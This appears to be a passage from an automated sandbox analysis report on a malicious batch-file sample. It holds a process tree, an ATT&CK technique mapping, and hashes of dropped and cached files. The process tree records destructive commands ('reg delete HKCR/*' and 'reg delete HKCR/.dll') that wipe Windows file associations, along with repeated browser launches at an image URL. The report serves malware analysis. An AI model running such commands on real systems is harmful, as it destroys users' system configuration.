reg delete HKCR/.dll
3⤵
PID:1968

C:\Windows\system32\reg.exe
reg delete HKCR/*
3⤵
PID:2092

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://vignette.wikia.nocookie.net/sanicsource/images/4/44/Maxresdefault_(1)-0.jpg/revision/latest?cb=20171022231956
3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2592

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2592 CREDAT:275457 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2408

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2592 CREDAT:537607 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2768

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2592 CREDAT:603139 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1792

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2592 CREDAT:10499073 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:616

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://vignette.wikia.nocookie.net/sanicsource/images/4/44/Maxresdefault_(1)-0.jpg/revision/latest?cb=20171022231956
3⤵
PID:2416

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://vignette.wikia.nocookie.net/sanicsource/images/4/44/Maxresdefault_(1)-0.jpg/revision/latest?cb=20171022231956
3⤵
PID:2472

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://vignette.wikia.nocookie.net/sanicsource/images/4/44/Maxresdefault_(1)-0.jpg/revision/latest?cb=20171022231956
3⤵
PID:2296

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://vignette.wikia.nocookie.net/sanicsource/images/4/44/Maxresdefault_(1)-0.jpg/revision/latest?cb=20171022231956
3⤵
PID:1200

C:\Program Files\Microsoft Games\solitaire\solitaire.exe
"C:\Program Files\Microsoft Games\solitaire\solitaire.exe"
1⤵
PID:1348

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:556

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:1736

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\50AF9541BD98FABBC164C24C0C808E14

Filesize
503B

MD5
2a49bde382803723373cbe1964a1afc2

SHA1
a0fb4448f63d7ded06638519585cbcb1f757be96

SHA256
f94e49e3866750fb0c6a26d92b11de455908bd2dda5e31d0076c543e589d1806

SHA512
dbbf62dbf81b142f443126a4b248b1eed6450350a497ed017f3bc759142bcfd5bea73474628bd44392aa3721dd165ccb7310e399dd53ad011780f3f0925e8de1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
0b783a4302b1c6d82b1d412a541f3815

SHA1
16413791b08da01fb951816f0cf7224be05e6a99

SHA256
7c61f2656105f9cdcef3942adb04802d652e9dfb9fdda66ac03c6b2d374471f5

SHA512
ba8ac33b36fe182711b9f56997c5c05e5c18e72123f3535274ee0765fada55a652d2488307497e07542d302ea91be23d506ff8b52bbc642011fe4a06e7b868c1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
b6822bb866cf7c9c3381c003a3bdcde1

SHA1
cb5ac6eef8a5b3f4538ef2c8afdf50822870b7c2

SHA256
c56ee91d46a20a9b8ba0583ebcae5e8c5951d1a016cb9b7d9c7a2c5aa912b149

SHA512
415add5386f4e3ce81cbf01b29b80d0d49b7c6d64651f2e36b1aa185980fd390838fbd8909a6d4f28c3cb1bb8836cfc0d61c6875589668e609d220b0514641d4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\50AF9541BD98FABBC164C24C0C808E14

Filesize
548B

MD5
51c15f4ad5b39877413fa6b33e4393fb

SHA1
267b47a5d43cf5713ed5268dcfc342d36e8dc044

SHA256
31368c211d5753f3f3969caf2b9ddb67c494ba288c0592fb6782b5f61c95adf5

SHA512
8781e3912bc927fa4781bcb0a5d927ded8e8374e91623afc46e9ac40171f48e442597657b3a2c4ac064d4153ce98901b0456a56eb58c3a90d0d87550f9d01644

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\50AF9541BD98FABBC164C24C0C808E14

Filesize
548B

MD5
f7092465f6610889a1ec88f66c45d7d4

SHA1
aeeec7bd5e6ffc242f175ff74e13471e28e0d33a

SHA256
e5e45ebf2d7d4073d6393b9ed40fc2ed75b39d0cfa7389a0f9ff02ccba8c04b2

SHA512
cd7f7323716e1ab959b951a8dc40465419d9f319fcb68d5a592b34f8e5e144faaa0362ed6c7b647232b1abf3d80a6ccb04fe52ec82100cb052828138cc55b2af

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\50AF9541BD98FABBC164C24C0C808E14

Filesize
548B

MD5
808dfd31c4eca13ac202fd1f200a135e

SHA1
89ca6ecb52f65d7dd2a97b5c322e853d7607e396

SHA256
e335c0741936a22503f0b8fd8b38f3f61018074df49b7f7c3b64c7b6dbe5d065

SHA512
af1abb45aadd94e6c60e8249bcbcd796067195a4646480a3bfda5fd82ae4184e61bbd5dcc6e509dded483dc7c862f37451a8e7f8d983df74f66cf10b44472009

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
1c06c6d4af61ac0bd362615ba72d0dbb

SHA1
7aed982c41fc91b0b23738e37b7fb2491ff7cc2c

SHA256
71bb231e28da4b69c2121a2affb2372aa817f4b927fbe6631d182a1501ead6ca

SHA512
b9c8afff8a0f0c2e6c150917944ba9f1decde78660c42f86afa1537d331e0145d6371da8f2fa6ef6637b36d1c8399ae9a65ce8aa7050b49201efb8fdb29b7567

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
b21d228a147593f6798c6fb131331ceb

SHA1
c9fdabf63a23c311f466df361993768ccd2e7510

SHA256
ee84cf47ed3011b0a8bb5083ddad97146d002a2911604e61de925635f70c5145

SHA512
c22d599b850b83aaa5ad1ca1c0e9a418456cfaa47093fec1bce2e98c6f6716c4e605c305d692eef73d4debabbdbc8a0759fa4981c3b7e6fdfa725e0ec1871322

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
a98712fca1508eaf9f7a6b2d24849d3c

SHA1
764a5612e99405dd9c6d88dec70d8296897da7af

SHA256
101a9ade082cecc947ae8ade98bff9d4b3e084946fec0b2fd02dd9bd32539a9a

SHA512
71a620241be555a843c57bfd20555c0bd0991af7fad57af8f37d2c1694cd696bab1292656917d4c2cb8b43ebc8e892902a03b02d9281010205930d99b487471d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
40265d32bb319bf7e11a24b36014b6d3

SHA1
90df6b8fbdaaad02d2349b4798b850819021c198

SHA256
dec11e168147f523281495a32ac909912a18b9312eec86d1e2b3539f0295301a

SHA512
fac1d52bb0a83aba23ad068128bf29d99efbb09d587a3246a9898675c9e6a7ea6613af180d7064956468495f92f50e746c910b905d8ac2454273bbfcf5e93814

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
265a9aee12aa54142c70d27729e52b8f

SHA1
e223f8b932dfa42850ff57e7096675b43b1d1437

SHA256
262b2f87079225b809727d793c882a1029fd270b14fcdd647a586bcf6d95daea

SHA512
b5aa584c65080002cb79966a8229ff144e7c5ef24606aa836dfcba07e28626002a154190df623bfc2bac894b2ff008dd91fd322b656566b360da718991efe85c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
d19736a9acce690532538bf7aed112b6

SHA1
9c00534a1aa22d38bb1645a3eeb880afee677641

SHA256
af53d81208ebe816d54a3f15a7d9e7063051e1fed5cac8f88e56d08e9d1a20ab

SHA512
0105aa3effad817da7ad8f275a3f5498afe980e9869f469efbabe14999df2e3d127b33da3865b0c5698c3ad9a9955eea3ddb74cdfc947be1c256a8a46bde4261

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
3d5500f712b68790518b2cd78ab9545e

SHA1
d1283bd3071ee4e9a2e580873a8aa314bad993dd

SHA256
7276b5ca1e1300b16bf956ffe0cf142e50cd214d3bcc6a0ae2c50f004692a516

SHA512
a8b846eac1252eba3cff65cf021488d09db335a3e4ae7b1fe851d572c6428c7360e1485220df17260be82043a47a831c7a66d3c1627213c46fe18a94a95e23d1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
d218058d8e42462a401fa6991c2aaf86

SHA1
860ea099761a6026424ffd134601f796419ad300

SHA256
b987553d8e64ac32970bd2f38ed04578f7c3edefdbc403367f572db36b56ee41

SHA512
c70a39050e7f5d96d9725580129b933332b7863781892fc978734c86f791427e278daed2ccd9640e5638bb998f25a1750c1323d7fcbe2fa587788043aca70b3a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
e059940e5b955569618262a2a2e24f82

SHA1
cca1c6bb533c14dcba31ba5798b1eb3021118d92

SHA256
d8d848b10d7f104ca6442370af08829a1c241064b674b1cbd80194a3ef60a208

SHA512
4e2c1d56bbb628b5390fec72188bf4ad5b70f9c3bfdfca53ef682b38a18911ede189162ff922f24988e3fe1cdcdd0441152f45fb95f7b8d944d7b3e8273712fe

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
82cdf826619a616096f5133da81f7b0c

SHA1
01c53636e121cd1fa35e3a03f0adc3c154a0bcf3

SHA256
95e1eabdac1fb3309178030a3672808bbfeaed77c904428c00746f67b1c77d70

SHA512
d8c7ca87fc7b58b61cf33b3e24d8a2464f9f4188d5ef85087e8d27a2cae0666d3958838117c5f7e67f21292be4473d760c7a3c07b676b04faf832ede651fedc0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
bd85f0c6506d4e62fc3150282d0b6152

SHA1
a5335c4c0fd8469360a8097a497f53840e65fba5

SHA256
56687942c62cf55aa16f938866a7f8cd5f20feb9ba940058490ca186c8a526e5

SHA512
a2974989b17a41716cc7e0e985d943a4dacb95436d282087571b556d0edf1437b975ac12af67378f75273a48ddb6ec4edf1035eddaab3e69afc4bdcedfa383bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\Maxresdefault_(1)-0[5].jpg

Filesize
58KB

MD5
7947d60fb24fed0c949b2a06e3b3a36a

SHA1
fef6f9e9d827f6a9811534b8856c4556dc6a3aa1

SHA256
4c40135dc4c707504349668316e389983ffe29cd230d9894f7fe199293b91d64

SHA512
7a76fb348fc5fc14a7c120e9592663e58a3eb468c65302edf8b507272f3e7b424352fbf1278b91b5c1d06852e6ad4782dea00c2bd5ed01655e7a37a37430779a

Download Submit
C:\Users\Admin\AppData\Local\Temp\4A2.tmp\4A3.tmp\4A4.bat

Filesize
2KB

MD5
2179e835371db1affaeeb20beff23d45

SHA1
f5dca43d68ea8eae28fec700a6848f17843373c7

SHA256
f33d75076e925db2a1ff58177449e05f5e4e1b0dceadd1143f9899f65dbe1137

SHA512
549e71121c709bff5eb7bca9c830696beb728ddad03d51c0b398716a46aef8433e893eca05efe6795565a214ae6b6ad2d396d0073e3008ab2894d73c2a2ea9a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabBA4.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2372.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarBB5.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\~DFE9475A0996DDCAB3.TMP

Filesize
16KB

MD5
ba0fb8c351299e15f54e86d6f85ff6d5

SHA1
ef7efa8bcb9d1b289760132a05ae37a3889b1a1e

SHA256
4ac6c22f0898ce119d1a257b12d47e7ff2b4d352f70b3773ebeb704e54789960

SHA512
90eeea720776699967017f4055c7cfa7d16715a53a413d64a6c95e0a78b6a23f2aa59077529208066ece670a899b18e230d13405739606a6b4a5f4be2bb9e8c4

Download Submit
memory/556-731-0x0000000002E90000-0x0000000002E91000-memory.dmp

Filesize
4KB

Download
memory/1348-725-0x0000000000320000-0x0000000000321000-memory.dmp

Filesize
4KB

Download
memory/1348-726-0x0000000000360000-0x000000000036A000-memory.dmp

Filesize
40KB

Download
memory/1348-727-0x0000000000360000-0x000000000036A000-memory.dmp

Filesize
40KB

Download
memory/1348-728-0x0000000000360000-0x000000000036A000-memory.dmp

Filesize
40KB

Download
memory/1348-729-0x0000000000360000-0x000000000036A000-memory.dmp

Filesize
40KB

Download
memory/1348-730-0x0000000000360000-0x0000000000364000-memory.dmp

Filesize
16KB

Download
memory/1736-732-0x0000000002B30000-0x0000000002B31000-memory.dmp

Filesize
4KB

Download